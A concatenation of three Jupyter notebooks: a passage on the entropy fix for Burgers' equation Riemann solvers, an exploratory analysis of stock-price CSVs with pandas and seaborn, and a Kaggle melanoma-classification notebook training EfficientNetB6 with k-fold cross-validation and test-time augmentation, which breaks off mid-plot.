approaches above, the solution was approximated by a single wave traveling either to the left or right. For this scalar problem, this "approximation" is, in fact, an exact weak solution of the Riemann problem. As discussed already, we do not typically need to worry about the fact that it may be entropy-violating, since the effect on the numerical solution (after averaging) is identical to that of the entropy-satisfying solution. # # However, if $q_l < 0 < q_r$, then the true solution is a transonic rarefaction, in which part of the wave travels to the left and part travels to the right. In this case, the true Riemann solution would lead to changes to both the left and right adjacent cells, whereas an approximate solution with a single wave will only modify one or the other. This leads to an incorrect numerical solution (on the macroscopic level). It is therefore necessary to modify the Riemann solver, imposing what is known as an *entropy fix* in the transonic case. # # Specifically, we use a solution consisting of two waves, each of which captures the net effect of the corresponding rarefaction wave that appears in the exact solution: # # \begin{align} # {\cal W}_1 & = q_m - q_l, & s_1 = \frac{q_l + q_m}{2} \\ # {\cal W}_2 & = q_r - q_m, & s_2 = \frac{q_m + q_r}{2}. # \end{align} # # For Burgers' equation, the value $q_s=0$ is the *sonic point* satisfying $f(q_s)=0$. A transonic rarefaction wave takes the value $q_s$ along $x/t = 0$ and so it makes sense to choose $q_m = 0$. The formulas above then simplify to # # \begin{align} # {\cal W}_1 & = - q_l, & s_1 = \frac{q_l}{2} \\ # {\cal W}_2 & = q_r, & s_2 = \frac{q_r}{2}. # \end{align} # # Note that this can also be viewed as an HLL solver, although not with the usual choice of wave speeds. Choosing the waves speeds $s^1=q_l/2$ and $s^2=q_r/2$ and then solving for $q_m$ by requiring conservation gives $q_m=0$. # We now repeat the example given above, but with the entropy fix applied. # + shock_efix = setup(2.,1.,efix=True) shock_efix.run() shocksol = burgers.exact_riemann_solution(2.,1.) raref_efix = setup(1.,2.,efix=True) raref_efix.run() rarefsol = burgers.exact_riemann_solution(1.,2.) transonic_efix = setup(-1.,2.,efix=True) transonic_efix.run() transonicsol = burgers.exact_riemann_solution(-1.,2.) def plot_frame(i): fig, axes = plt.subplots(2,3,figsize=(8,4)) for ax in axes[0]: ax.set_xlim((-1,1)); ax.set_ylim((-1.1,2.1)) sxc = shock_efix.frames[0].grid.x.centers rxc = raref_efix.frames[0].grid.x.centers txc = transonic_efix.frames[0].grid.x.centers axes[1][0].plot(sxc, shock_efix.frames[i].q[0,:],'-k',lw=2) axes[1][0].set_title('Shock') axes[1][1].plot(rxc, raref_efix.frames[i].q[0,:],'-k',lw=2) axes[1][1].set_title('Rarefaction') axes[1][2].plot(txc, transonic_efix.frames[i].q[0,:],'-k',lw=2) axes[1][2].set_title('Transonic rarefaction') t = i/10. riemann_tools.plot_waves(*shocksol,ax=axes[0][0],t=t) riemann_tools.plot_waves(*rarefsol,ax=axes[0][1],t=t) riemann_tools.plot_waves(*transonicsol,ax=axes[0][2],t=t) plt.tight_layout() plt.show() interact(plot_frame, i=IntSlider(min=0, max=10, description='Frame')); # - # The entropy fix has no effect on the first two solutions, since it is applied only in the case of a transonic rarefaction. The third solution is greatly improved, and will converge to the correct weak solution as the grid is refined.
Burgers_approximate.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- import pandas as pd #importing necessary libraries import numpy as np data = pd.read_csv('DataFrame.csv') #Reading csv file and creating DataFrame print(data.shape) data.head() data.drop('Unnamed: 7' , axis = 1 , inplace = True) #Dropping unnecessary Column:-> Unnamed: 7 data.rename(columns = str.upper , inplace = True) data # # CONVERTING STRING INTO DATE TIME SERIES import datetime data['DATE'] = pd.to_datetime(data['DATE'] , format = "%Y%m%d") data.head() import missingno as msno #Checking for the missing entries msno.bar(data) data.describe() #Statistics of the Dataset data.info() data[data.duplicated()] #Checking for the duplicated entries # # CONSIDERING ANOTHER DATASET df2 = pd.read_csv('MSFT.csv') df2.head() df2.rename(columns = str.upper , inplace = True) df2['DATE'] = pd.to_datetime(df2['DATE'] , format = "%Y-%m-%d") df2.head() df2[df2.duplicated()] df2.describe() df2.isna().sum() df2.info() df2.value_counts() # # EDA ANALYSIS (DataFrame.csv) import matplotlib.pyplot as plt import seaborn as sns d1 = data.copy() # + plt.figure(figsize=(20,10)) #creating distribution plots of various attributes plt.subplot(2,2,1) sns.distplot(x = d1['OPEN'] , kde=False , color = 'red' , hist_kws = {'alpha':1}) plt.xlabel('OPEN') plt.title('Distribution plot of OPEN') plt.subplot(2,2,2) sns.distplot(x = d1['HIGH'] , kde=False , color = 'darkblue') plt.xlabel('HIGH') plt.title('Distribution plot of HIGH') plt.subplot(2,2,3) sns.distplot(x = d1['LOW'] , kde=False , color = 'yellow' , hist_kws = {'alpha':1}) plt.xlabel('LOW') plt.title('Distribution plot of LOW') plt.subplot(2,2,4) sns.distplot(x = d1['CLOSE'] , kde=False , color = 'darkgreen') plt.xlabel('CLOSE') plt.title('Distribution plot of CLOSE') # + plt.figure(figsize=(20,10)) #creating scatter plots of various attributes plt.subplot(2,2,1) sns.scatterplot(x = d1['OPEN'] , y = d1['CLOSE'] , color = 'red') plt.xlabel('OPEN') plt.ylabel('CLOSE') plt.title('Scatter plot of OPEN and CLOSE') plt.subplot(2,2,2) sns.scatterplot(x = d1['HIGH'] , y = d1['LOW'] , color = 'darkblue') plt.xlabel('HIGH') plt.ylabel('LOW') plt.title('Scatter plot of HIGH and LOW') plt.subplot(2,2,3) sns.scatterplot(x = d1['LOW'] , y = d1['OPEN'] , color = 'yellow') plt.xlabel('LOW') plt.ylabel('OPEN') plt.title('Scatter plot of LOW and OPEN') plt.subplot(2,2,4) sns.scatterplot(x = d1['CLOSE'] , y = d1['HIGH'] , color = 'darkgreen') plt.xlabel('CLOSE') plt.ylabel('HIGH') plt.title('Scatter plot of CLOSE and HIGH') # + plt.figure(figsize=(20,14)) #plot of line plot btwn Date and various other attributes plt.subplot(2,2,1) plt.title('Line plot b/w DATE and OPEN') sns.lineplot(x = d1['DATE'] , y = d1['OPEN'] , color = 'Red') plt.xticks(rotation = 45); plt.subplot(2,2,2) plt.title('Line plot b/w DATE and CLOSE') sns.lineplot(x = d1['DATE'] , y = d1['CLOSE'] , color = 'Blue') plt.xticks(rotation = 45); plt.subplot(2,2,3) plt.title('Line plot b/w DATE and LOW') sns.lineplot(x = d1['DATE'] , y = d1['LOW'] , color = 'Green') plt.xticks(rotation = 45); plt.subplot(2,2,4) plt.title('Line plot b/w DATE and HIGH') sns.lineplot(x = d1['DATE'] , y = d1['HIGH'] , color = 'Black') plt.xticks(rotation = 45); # + plt.figure(figsize=(20,10)) #creating Box plots of various attributes plt.subplot(2,2,1) sns.boxplot(x = d1['OPEN'] , color = 'red') plt.xlabel('OPEN') plt.title('Distribution plot of OPEN') plt.subplot(2,2,2) sns.boxplot(x = d1['HIGH'] , color = 'darkblue') plt.xlabel('HIGH') plt.title('Distribution plot of HIGH') plt.subplot(2,2,3) sns.boxplot(x = d1['LOW'] , color = 'yellow') plt.xlabel('LOW') plt.title('Distribution plot of LOW') plt.subplot(2,2,4) sns.boxplot(x = d1['CLOSE'] , color = 'darkgreen') plt.xlabel('CLOSE') plt.title('Distribution plot of CLOSE') # - sns.heatmap(d1.corr() , vmin = -1 , vmax = 1 , annot = True , cmap = 'Blues') #heat map to determine correlation # # EDA ANALYSIS (MSFT.csv) d2 = df2.copy() # + plt.figure(figsize=(15,15)) #creating distribution plots of various attributes plt.subplot(3,3,1) sns.distplot(x = d2['OPEN'] , kde=False , color = 'red' , hist_kws = {'alpha':1}) plt.xlabel('OPEN') plt.title('Distribution plot of OPEN') plt.subplot(3,3,2) sns.distplot(x = d2['HIGH'] , kde=False , color = 'darkblue') plt.xlabel('HIGH') plt.title('Distribution plot of HIGH') plt.subplot(3,3,3) sns.distplot(x = d2['LOW'] , kde=False , color = 'yellow' , hist_kws = {'alpha':1}) plt.xlabel('LOW') plt.title('Distribution plot of LOW') plt.subplot(3,3,4) sns.distplot(x = d2['CLOSE'] , kde=False , color = 'purple' , hist_kws = {'alpha':1}) plt.xlabel('CLOSE') plt.title('Distribution plot of CLOSE') plt.subplot(3,3,5) sns.distplot(x = d2['ADJ CLOSE'] , kde=False , color = 'black' , hist_kws = {'alpha':1}) plt.xlabel('ADJ CLOSE') plt.title('Distribution plot of ADJ CLOSE') plt.subplot(3,3,6) sns.distplot(x = d2['VOLUME'] , kde=False , color = 'brown' , hist_kws = {'alpha':1}) plt.xlabel('VOLUME') plt.title('Distribution plot of VOLUME') # - plt.figure(figsize=(15,10)) #plot of line plot btwn Date and various other attributes d2 = d2.set_index('DATE') sns.lineplot(data = d2) # + plt.figure(figsize=(20,10)) #creating scatter plots of various attributes plt.subplot(2,2,1) sns.scatterplot(x = d2['OPEN'] , y = d2['VOLUME'] , color = 'red') plt.xlabel('OPEN') plt.ylabel('VOLUME') plt.title('Scatter plot of OPEN and VOLUME') plt.subplot(2,2,2) sns.scatterplot(x = d2['HIGH'] , y = d2['VOLUME'] , color = 'darkblue') plt.xlabel('HIGH') plt.ylabel('VOLUME') plt.title('Scatter plot of HIGH and VOLUME') plt.subplot(2,2,3) sns.scatterplot(x = d2['LOW'] , y = d2['ADJ CLOSE'] , color = 'yellow') plt.xlabel('LOW') plt.ylabel('ADJ CLOSE') plt.title('Scatter plot of LOW and ADJ CLOSE') plt.subplot(2,2,4) sns.scatterplot(x = d2['OPEN'] , y = d2['ADJ CLOSE'] , color = 'darkgreen') plt.xlabel('CLOSE') plt.ylabel('ADJ CLOSE') plt.title('Scatter plot of CLOSE and ADJ CLOSE') # + plt.figure(figsize=(20,15)) #creating box plots of various attributes plt.subplot(3,2,1) sns.boxplot(x = d2['OPEN'] , color = 'red') plt.xlabel('OPEN') plt.title('Distribution plot of OPEN') plt.subplot(3,2,2) sns.boxplot(x = d2['HIGH'] , color = 'darkblue') plt.xlabel('HIGH') plt.title('Distribution plot of HIGH') plt.subplot(3,2,3) sns.boxplot(x = d2['LOW'] , color = 'yellow') plt.xlabel('LOW') plt.title('Distribution plot of LOW') plt.subplot(3,2,4) sns.boxplot(x = d2['CLOSE'] , color = 'darkgreen') plt.xlabel('CLOSE') plt.title('Distribution plot of CLOSE') plt.subplot(3,2,5) sns.boxplot(x = d2['ADJ CLOSE'] , color = 'pink') plt.xlabel('ADJ CLOSE') plt.title('Distribution plot of ADJ CLOSE') plt.subplot(3,2,6) sns.boxplot(x = d2['VOLUME'] , color = 'brown') plt.xlabel('VOLUME') plt.title('Distribution plot of VOLUME') # + plt.figure(figsize=(22,17)) #creating violin plots of various attributes plt.subplot(3,2,1) sns.violinplot(x = d2['OPEN'] , color = 'red') plt.xlabel('OPEN') plt.title('Distribution plot of OPEN') plt.subplot(3,2,2) sns.violinplot(x = d2['HIGH'] , color = 'darkblue') plt.xlabel('HIGH') plt.title('Distribution plot of HIGH') plt.subplot(3,2,3) sns.violinplot(x = d2['LOW'] , color = 'yellow') plt.xlabel('LOW') plt.title('Distribution plot of LOW') plt.subplot(3,2,4) sns.violinplot(x = d2['CLOSE'] , color = 'darkgreen') plt.xlabel('CLOSE') plt.title('Distribution plot of CLOSE') plt.subplot(3,2,5) sns.violinplot(x = d2['ADJ CLOSE'] , color = 'pink') plt.xlabel('CLOSE') plt.title('Distribution plot of ADJ CLOSE') plt.subplot(3,2,6) sns.violinplot(x = d2['VOLUME'] , color = 'brown') plt.xlabel('VOLUME') plt.title('Distribution plot of VOLUME') # - sns.heatmap(d2.corr() , vmin = -1 , vmax = 1 , annot = True , cmap = 'Paired_r') #heat map to determine correlation
Datasets/.ipynb_checkpoints/STOCK PRICE PREDICTION TECHNOCOLABS-checkpoint.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # ## Dependencies # + _cell_guid="b1076dfc-b9ad-4769-8c92-a6c4dae69d19" _kg_hide-input=true _uuid="8f2839f25d086af736a60e9eeb907d3b93b6e0e5" # !pip install --quiet efficientnet # # !pip install --quiet image-classifiers # + _kg_hide-input=true import warnings, json, re, glob, math # from scripts_step_lr_schedulers import * from melanoma_utility_scripts import * from kaggle_datasets import KaggleDatasets from sklearn.model_selection import KFold import tensorflow.keras.layers as L import tensorflow.keras.backend as K from tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint, LearningRateScheduler from tensorflow.keras import optimizers, layers, metrics, losses, Model import tensorflow_addons as tfa import efficientnet.tfkeras as efn # from classification_models.tfkeras import Classifiers SEED = 42 seed_everything(SEED) warnings.filterwarnings('ignore') # - # ## TPU configuration # + _kg_hide-input=true strategy, tpu = set_up_strategy() REPLICAS = strategy.num_replicas_in_sync print(f'REPLICAS: {REPLICAS}') AUTO = tf.data.experimental.AUTOTUNE # - # # Model parameters # + _cell_guid="79c7e3d0-c299-4dcb-8224-4455121ee9b0" _kg_hide-input=true _uuid="d629ff2d2480ee46fbb7e2d37f6b5fab8052498a" config = { "HEIGHT": 256, "WIDTH": 256, "CHANNELS": 3, "BATCH_SIZE": 32, "EPOCHS": 12, "LEARNING_RATE": 1e-3, "ES_PATIENCE": 5, "N_FOLDS": 5, "N_USED_FOLDS": 5, "TTA_STEPS": 11, "BASE_MODEL": 'EfficientNetB6', "BASE_MODEL_WEIGHTS": 'imagenet', "DATASET_PATH": 'melanoma-256x256' } with open('config.json', 'w') as json_file: json.dump(json.loads(json.dumps(config)), json_file) config # - # # Load data # + _kg_hide-input=true database_base_path = '/kaggle/input/siim-isic-melanoma-classification/' train = pd.read_csv(database_base_path + 'train.csv') test = pd.read_csv(database_base_path + 'test.csv') print('Train samples: %d' % len(train)) display(train.head()) print(f'Test samples: {len(test)}') display(test.head()) GCS_PATH = KaggleDatasets().get_gcs_path(f"melanoma-{config['HEIGHT']}x{config['WIDTH']}") GCS_2019_PATH = KaggleDatasets().get_gcs_path(f"isic2019-{config['HEIGHT']}x{config['WIDTH']}") GCS_MALIGNANT_PATH = KaggleDatasets().get_gcs_path(f"malignant-v2-{config['HEIGHT']}x{config['WIDTH']}") # - # # Augmentations # + _kg_hide-input=true def data_augment(image): p_rotation = tf.random.uniform([], 0, 1.0, dtype=tf.float32) p_rotate = tf.random.uniform([], 0, 1.0, dtype=tf.float32) p_cutout = tf.random.uniform([], 0, 1.0, dtype=tf.float32) p_shear = tf.random.uniform([], 0, 1.0, dtype=tf.float32) p_crop = tf.random.uniform([], 0, 1.0, dtype=tf.float32) if p_shear > .2: if p_shear > .6: image = transform_shear(image, config['HEIGHT'], shear=5.) else: image = transform_shear(image, config['HEIGHT'], shear=-5.) if p_rotation > .2: if p_rotation > .6: image = transform_rotation(image, config['HEIGHT'], rotation=45.) else: image = transform_rotation(image, config['HEIGHT'], rotation=-45.) if p_crop > .5: image = data_augment_crop(image) if p_rotate > .2: image = data_augment_rotate(image) image = data_augment_spatial(image) image = tf.image.random_saturation(image, 0.7, 1.3) image = tf.image.random_contrast(image, 0.8, 1.2) image = tf.image.random_brightness(image, 0.1) if p_cutout > .7: image = data_augment_cutout(image) return image def data_augment_tta(image): p_rotation = tf.random.uniform([], 0, 1.0, dtype=tf.float32) p_rotate = tf.random.uniform([], 0, 1.0, dtype=tf.float32) p_crop = tf.random.uniform([], 0, 1.0, dtype=tf.float32) if p_rotation > .2: if p_rotation > .6: image = transform_rotation(image, config['HEIGHT'], rotation=45.) else: image = transform_rotation(image, config['HEIGHT'], rotation=-45.) if p_crop > .5: image = data_augment_crop(image) if p_rotate > .2: image = data_augment_rotate(image) image = data_augment_spatial(image) image = tf.image.random_saturation(image, 0.7, 1.3) image = tf.image.random_contrast(image, 0.8, 1.2) image = tf.image.random_brightness(image, 0.1) return image def data_augment_spatial(image): p_spatial = tf.random.uniform([], 0, 1.0, dtype=tf.float32) image = tf.image.random_flip_left_right(image) image = tf.image.random_flip_up_down(image) if p_spatial > .75: image = tf.image.transpose(image) return image def data_augment_rotate(image): p_rotate = tf.random.uniform([], 0, 1.0, dtype=tf.float32) if p_rotate > .66: image = tf.image.rot90(image, k=3) # rotate 270º elif p_rotate > .33: image = tf.image.rot90(image, k=2) # rotate 180º else: image = tf.image.rot90(image, k=1) # rotate 90º return image def data_augment_crop(image): p_crop = tf.random.uniform([], 0, 1.0, dtype=tf.float32) crop_size = tf.random.uniform([], int(config['HEIGHT']*.7), config['HEIGHT'], dtype=tf.int32) if p_crop > .5: image = tf.image.random_crop(image, size=[crop_size, crop_size, config['CHANNELS']]) else: if p_crop > .4: image = tf.image.central_crop(image, central_fraction=.7) elif p_crop > .2: image = tf.image.central_crop(image, central_fraction=.8) else: image = tf.image.central_crop(image, central_fraction=.9) image = tf.image.resize(image, size=[config['HEIGHT'], config['WIDTH']]) return image def data_augment_cutout(image, min_mask_size=(int(config['HEIGHT'] * .1), int(config['HEIGHT'] * .1)), max_mask_size=(int(config['HEIGHT'] * .125), int(config['HEIGHT'] * .125))): p_cutout = tf.random.uniform([], 0, 1.0, dtype=tf.float32) if p_cutout > .85: # 10~15 cut outs n_cutout = tf.random.uniform([], 10, 15, dtype=tf.int32) image = random_cutout(image, config['HEIGHT'], config['WIDTH'], min_mask_size=min_mask_size, max_mask_size=max_mask_size, k=n_cutout) elif p_cutout > .6: # 5~10 cut outs n_cutout = tf.random.uniform([], 5, 10, dtype=tf.int32) image = random_cutout(image, config['HEIGHT'], config['WIDTH'], min_mask_size=min_mask_size, max_mask_size=max_mask_size, k=n_cutout) elif p_cutout > .25: # 2~5 cut outs n_cutout = tf.random.uniform([], 2, 5, dtype=tf.int32) image = random_cutout(image, config['HEIGHT'], config['WIDTH'], min_mask_size=min_mask_size, max_mask_size=max_mask_size, k=n_cutout) else: # 1 cut out image = random_cutout(image, config['HEIGHT'], config['WIDTH'], min_mask_size=min_mask_size, max_mask_size=max_mask_size, k=1) return image # - # ## Auxiliary functions # + _kg_hide-input=true def read_labeled_tfrecord(example): tfrec_format = { 'image' : tf.io.FixedLenFeature([], tf.string), 'image_name' : tf.io.FixedLenFeature([], tf.string), 'patient_id' : tf.io.FixedLenFeature([], tf.int64), 'sex' : tf.io.FixedLenFeature([], tf.int64), 'age_approx' : tf.io.FixedLenFeature([], tf.int64), 'anatom_site_general_challenge': tf.io.FixedLenFeature([], tf.int64), 'diagnosis' : tf.io.FixedLenFeature([], tf.int64), 'target' : tf.io.FixedLenFeature([], tf.int64) } example = tf.io.parse_single_example(example, tfrec_format) return example['image'], example['target'] def read_unlabeled_tfrecord(example, return_image_name): tfrec_format = { 'image' : tf.io.FixedLenFeature([], tf.string), 'image_name' : tf.io.FixedLenFeature([], tf.string), } example = tf.io.parse_single_example(example, tfrec_format) return example['image'], example['image_name'] if return_image_name else 0 def prepare_image(img, augment=None, dim=256): img = tf.image.decode_jpeg(img, channels=3) img = tf.cast(img, tf.float32) / 255.0 if augment: img = augment(img) img = tf.reshape(img, [dim, dim, 3]) return img def get_dataset(files, augment=None, shuffle=False, repeat=False, labeled=True, return_image_names=True, batch_size=16, dim=256): ds = tf.data.TFRecordDataset(files, num_parallel_reads=AUTO) ds = ds.cache() if repeat: ds = ds.repeat() if shuffle: ds = ds.shuffle(1024*8) opt = tf.data.Options() opt.experimental_deterministic = False ds = ds.with_options(opt) if labeled: ds = ds.map(read_labeled_tfrecord, num_parallel_calls=AUTO) else: ds = ds.map(lambda example: read_unlabeled_tfrecord(example, return_image_names), num_parallel_calls=AUTO) ds = ds.map(lambda img, imgname_or_label: (prepare_image(img, augment=augment, dim=dim), imgname_or_label), num_parallel_calls=AUTO) ds = ds.batch(batch_size * REPLICAS) ds = ds.prefetch(AUTO) return ds def count_data_items(filenames): n = [int(re.compile(r"-([0-9]*)\.").search(filename).group(1)) for filename in filenames] return np.sum(n) # - # ## Learning rate scheduler # + _kg_hide-input=true def get_lr_callback(batch_size=8): lr_start = 0.000005 lr_max = 0.00000125 * REPLICAS * config['BATCH_SIZE'] lr_min = 0.000001 lr_ramp_ep = 5 lr_sus_ep = 0 lr_decay = 0.8 def lrfn(epoch): if epoch < lr_ramp_ep: lr = (lr_max - lr_start) / lr_ramp_ep * epoch + lr_start elif epoch < lr_ramp_ep + lr_sus_ep: lr = lr_max else: lr = (lr_max - lr_min) * lr_decay**(epoch - lr_ramp_ep - lr_sus_ep) + lr_min return lr lr_callback = tf.keras.callbacks.LearningRateScheduler(lrfn, verbose=False) return lr_callback # - # # Model # + _kg_hide-input=true # Initial bias #2019 pos = 2.3% #2018 pos = 1.3% pos = len(train[train['target'] == 1]) neg = len(train[train['target'] == 0]) initial_bias = np.log([pos/neg]) print('Bias') print(pos) print(neg) print(initial_bias) # class weights total = len(train) weight_for_0 = (1 / neg)*(total)/2.0 weight_for_1 = (1 / pos)*(total)/2.0 class_weight = {0: weight_for_0, 1: weight_for_1} print('Class weight') print(class_weight) # - def model_fn(input_shape=(256, 256, 3)): input_image = L.Input(shape=input_shape, name='input_image') base_model = efn.EfficientNetB6(input_shape=input_shape, weights=config['BASE_MODEL_WEIGHTS'], include_top=False) x = base_model(input_image) x = L.GlobalAveragePooling2D()(x) output = L.Dense(1, activation='sigmoid', name='output', bias_initializer=tf.keras.initializers.Constant(initial_bias))(x) model = Model(inputs=input_image, outputs=output) opt = optimizers.Adam(learning_rate=0.001) loss = losses.BinaryCrossentropy(label_smoothing=0.05) model.compile(optimizer=opt, loss=loss,metrics=['AUC']) return model # # Training # + _kg_hide-input=true _kg_hide-output=true skf = KFold(n_splits=config['N_USED_FOLDS'], shuffle=True, random_state=SEED) oof_pred = []; oof_tar = []; oof_val = []; oof_names = []; oof_folds = []; history_list = []; oof_pred_last = [] preds = np.zeros((len(test), 1)) preds_last = np.zeros((len(test), 1)) for fold,(idxT, idxV) in enumerate(skf.split(np.arange(15))): if tpu: tf.tpu.experimental.initialize_tpu_system(tpu) print(f'\nFOLD: {fold+1}') print(f'TRAIN: {idxT} VALID: {idxV}') # CREATE TRAIN AND VALIDATION SUBSETS TRAINING_FILENAMES = tf.io.gfile.glob([GCS_PATH + '/train%.2i*.tfrec' % x for x in idxT]) # Add external data # TRAINING_FILENAMES += tf.io.gfile.glob([GCS_2019_PATH + '/train%.2i*.tfrec' % (x*2+1) for x in idxT]) # 2019 data # TRAINING_FILENAMES += tf.io.gfile.glob([GCS_2019_PATH + '/train%.2i*.tfrec' % (x*2) for x in idxT]) # 2018 data # Add extra malignant data TRAINING_FILENAMES += tf.io.gfile.glob([GCS_MALIGNANT_PATH + '/train%.2i*.tfrec' % x for x in idxT]) # 2020 data # TRAINING_FILENAMES += tf.io.gfile.glob([GCS_MALIGNANT_PATH + '/train%.2i*.tfrec' % ((x*2+1)+30) for x in idxT]) # 2019 data # TRAINING_FILENAMES += tf.io.gfile.glob([GCS_MALIGNANT_PATH + '/train%.2i*.tfrec' % ((x*2)+30) for x in idxT]) # 2018 data # TRAINING_FILENAMES += tf.io.gfile.glob([GCS_MALIGNANT_PATH + '/train%.2i*.tfrec' % (x+15) for x in idxT]) # new data np.random.shuffle(TRAINING_FILENAMES) files_valid = tf.io.gfile.glob([GCS_PATH + '/train%.2i*.tfrec'%x for x in idxV]) TEST_FILENAMES = np.sort(np.array(tf.io.gfile.glob(GCS_PATH + '/test*.tfrec'))) ct_valid = count_data_items(files_valid) ct_test = count_data_items(TEST_FILENAMES) VALID_STEPS = config['TTA_STEPS'] * ct_valid/config['BATCH_SIZE']/4/REPLICAS TEST_STEPS = config['TTA_STEPS'] * ct_test/config['BATCH_SIZE']/4/REPLICAS # BUILD MODEL K.clear_session() with strategy.scope(): model = model_fn((config['HEIGHT'], config['WIDTH'], config['CHANNELS'])) model_path_best = f'model_{fold}.h5' model_path_last = f'model_{fold}_last.h5' checkpoint = ModelCheckpoint(model_path_best, monitor='val_loss', mode='min', save_best_only=True, save_weights_only=True, verbose=0) # TRAIN history = model.fit(get_dataset(TRAINING_FILENAMES, augment=data_augment, shuffle=True, repeat=True, dim=config['HEIGHT'], batch_size=config['BATCH_SIZE']), validation_data=get_dataset(files_valid,augment=None,shuffle=False, repeat=False,dim=config['HEIGHT']), steps_per_epoch=count_data_items(TRAINING_FILENAMES)/config['BATCH_SIZE']//REPLICAS, callbacks=[checkpoint, get_lr_callback(config['BATCH_SIZE'])], epochs=config['EPOCHS'], verbose=2).history history_list.append(history) model.save_weights(model_path_last) # Load best weights model.load_weights(model_path_best) # PREDICT OOF USING TTA (last) print('Predicting OOF with TTA (last)...') ds_valid = get_dataset(files_valid, labeled=False, return_image_names=False, augment=data_augment_tta, repeat=True, shuffle=False, dim=config['HEIGHT'], batch_size=config['BATCH_SIZE']*4) pred = model.predict(ds_valid, steps=VALID_STEPS, verbose=2)[:config['TTA_STEPS']*ct_valid,] oof_pred_last.append(np.mean(pred.reshape((ct_valid, config['TTA_STEPS']), order='F'),axis=1)) # PREDICT TEST USING TTA (last) print('Predicting Test with TTA (last)...') ds_test = get_dataset(TEST_FILENAMES, labeled=False, return_image_names=False, augment=data_augment_tta, repeat=True, shuffle=False, dim=config['HEIGHT'], batch_size=config['BATCH_SIZE']*4) pred = model.predict(ds_test, steps=TEST_STEPS, verbose=2)[:config['TTA_STEPS']*ct_test,] preds_last[:,0] += np.mean(pred.reshape((ct_test, config['TTA_STEPS']), order='F'), axis=1) / config['N_USED_FOLDS'] # # Load best weights # model.load_weights(model_path_best) # PREDICT OOF USING TTA (best) print('Predicting OOF with TTA (best)...') ds_valid = get_dataset(files_valid, labeled=False, return_image_names=False, augment=data_augment, repeat=True, shuffle=False, dim=config['HEIGHT'], batch_size=config['BATCH_SIZE']*4) pred = model.predict(ds_valid, steps=VALID_STEPS, verbose=2)[:config['TTA_STEPS']*ct_valid,] oof_pred.append(np.mean(pred.reshape((ct_valid, config['TTA_STEPS']), order='F'), axis=1)) # GET OOF TARGETS AND NAMES ds_valid = get_dataset(files_valid, augment=None, repeat=False, dim=config['HEIGHT'], labeled=True, return_image_names=True) oof_tar.append(np.array([target.numpy() for img, target in iter(ds_valid.unbatch())])) oof_folds.append(np.ones_like(oof_tar[-1], dtype='int8')*fold) ds = get_dataset(files_valid, augment=None, repeat=False, dim=config['HEIGHT'], labeled=False, return_image_names=True) oof_names.append(np.array([img_name.numpy().decode("utf-8") for img, img_name in iter(ds.unbatch())])) # PREDICT TEST USING TTA (best) print('Predicting Test with TTA (best)...') ds_test = get_dataset(TEST_FILENAMES, labeled=False, return_image_names=False, augment=data_augment, repeat=True, shuffle=False, dim=config['HEIGHT'], batch_size=config['BATCH_SIZE']*4) pred = model.predict(ds_test, steps=TEST_STEPS, verbose=2)[:config['TTA_STEPS']*ct_test,] preds[:,0] += np.mean(pred.reshape((ct_test, config['TTA_STEPS']), order='F'), axis=1) / config['N_USED_FOLDS'] # REPORT RESULTS auc = roc_auc_score(oof_tar[-1], oof_pred[-1]) auc_last = roc_auc_score(oof_tar[-1], oof_pred_last[-1]) oof_val.append(np.max(history['val_auc'])) print('#### FOLD %i OOF AUC = %.3f, with TTA (best) = %.3f, with TTA (last) = %.3f' % (fold+1, oof_val[-1], auc, auc_last)) # - # ## Model loss graph # + _kg_hide-input=true for n_fold, history in enumerate(history_list): print(f'Fold: {n_fold + 1}') plt.figure(figsize=(15,5)) plt.plot(np.arange(config['EPOCHS']), history['auc'],'-o',label='Train AUC',color='#ff7f0e') plt.plot(np.arange(config['EPOCHS']), history['val_auc'],'-o',label='Val AUC',color='#1f77b4') x = np.argmax(history['val_auc']) y = np.max(history['val_auc']) xdist = plt.xlim()[1] - plt.xlim()[0] ydist = plt.ylim()[1] - plt.ylim()[0] plt.scatter(x,y,s=200,color='#1f77b4') plt.text(x-0.03*xdist,y-0.13*ydist,'max auc\n%.2f'%y,size=14) plt.ylabel('AUC',size=14) plt.xlabel('Epoch',size=14) plt.legend(loc=2) plt2 = plt.gca().twinx() plt2.plot(np.arange(config['EPOCHS']), history['loss'],'-o',label='Train Loss',color='#2ca02c') plt2.plot(np.arange(config['EPOCHS']), history['val_loss'],'-o',label='Val Loss',color='#d62728') x = np.argmin(history['val_loss']) y = np.min(history['val_loss']) ydist = plt.ylim()[1] - plt.ylim()[0] plt.scatter(x,y,s=200,color='#d62728') plt.text(x-0.03*xdist,y+0.05*ydist,'min loss',size=14) plt.ylabel('Loss',size=14) plt.title('FOLD %i - Image Size %i' % (n_fold+1, config['HEIGHT']), size=18) plt.legend(loc=3) plt.show() # - # ## Model loss graph aggregated # + _kg_hide-input=true plot_metrics_agg(history_list, config['N_USED_FOLDS']) # - # # Model evaluation # + _kg_hide-input=true # COMPUTE OVERALL OOF AUC (last) oof = np.concatenate(oof_pred_last) true = np.concatenate(oof_tar) names = np.concatenate(oof_names) folds = np.concatenate(oof_folds) auc = roc_auc_score(true, oof) print('Overall OOF AUC with TTA (last) = %.3f' % auc) # COMPUTE OVERALL OOF AUC oof = np.concatenate(oof_pred) true = np.concatenate(oof_tar) names = np.concatenate(oof_names) folds = np.concatenate(oof_folds) auc = roc_auc_score(true, oof) print('Overall OOF AUC with TTA = %.3f' % auc) # SAVE OOF TO DISK df_oof = pd.DataFrame(dict(image_name=names, target=true, pred=oof, fold=folds)) df_oof.to_csv('oof.csv', index=False) df_oof.head() # - # # Visualize test predictions # + _kg_hide-input=true ds = get_dataset(TEST_FILENAMES, augment=False, repeat=False, dim=config['HEIGHT'], labeled=False, return_image_names=True) image_names = np.array([img_name.numpy().decode("utf-8") for img, img_name in iter(ds.unbatch())]) submission = pd.DataFrame(dict(image_name=image_names, target=preds[:,0], target_last=preds_last[:,0])) submission = submission.sort_values('image_name') print(f"Test predictions {len(submission[submission['target'] > .5])}|{len(submission[submission['target'] <= .5])}") print(f"Test predictions (last) {len(submission[submission['target_last'] > .5])}|{len(submission[submission['target_last'] <= .5])}") print('Top 10 samples') display(submission.head(10)) print('Top 10 positive samples') display(submission.query('target > .5').head(10)) fig = plt.subplots(figsize=(20, 5)) 